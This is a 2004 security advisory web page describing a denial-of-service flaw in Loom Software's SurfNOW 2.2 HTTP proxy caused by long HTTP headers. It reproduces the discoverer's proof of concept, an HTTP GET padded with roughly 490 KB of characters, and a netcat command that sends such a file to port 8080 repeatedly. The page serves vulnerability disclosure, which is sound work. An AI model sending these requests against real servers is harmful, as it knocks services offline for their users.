Skip navigation
Menu
Security

Denial of Service Vulnerability in Loomsoft SurfNow! HTTP Proxy

Reported January 29, 2004 by Donato Ferrante.

 

 

VERSIONS AFFECTED

 

  • Loom Software's SurfNOW 2.2 and earlier

 

DESCRIPTION

 

Loom Software's SurfNOW 2.2 and earlier contains a Denial of Service (DoS) vulnerability. This vulnerability is a result of a flaw in the way SurfNOW handles long HTTP headers.

 

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

GET \aaaaaaaaaaaaa\[ 490 kb of a \]aaaa HTTP/1.1\n\n\n

NOTE: 490Kb of the character 'a' is being sent.

It is possible to test this bug in another way using NetCat, repetitively:

nc -v -v host 8080 <  testFile.txt
( note: "testFile.txt" is a file of 490 Kb as \[1\] )

 

VENDOR RESPONSE

 

Loom Software has been notified.

 

CREDIT

 

Discovered by Donato Ferrante.

TAGS: Security
Hide comments

More information about text formats

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish
Recommended Reading
Businesswoman challenges concept and gender obstacles
Women in Cybersecurity Face Barriers to Hiring, Advancement
Apr 15, 2024
person typing on keyboard with icons for certificates
Top IT Certifications for a Career in Finance
Apr 12, 2024
employee working on a laptop with AI
Why AI Coding Assistants May Be Greatest Cybersecurity Threat Facing Your Business
Mar 26, 2024
cleaning products
6 Essential Steps for Spring Cleaning Your Website
Mar 21, 2024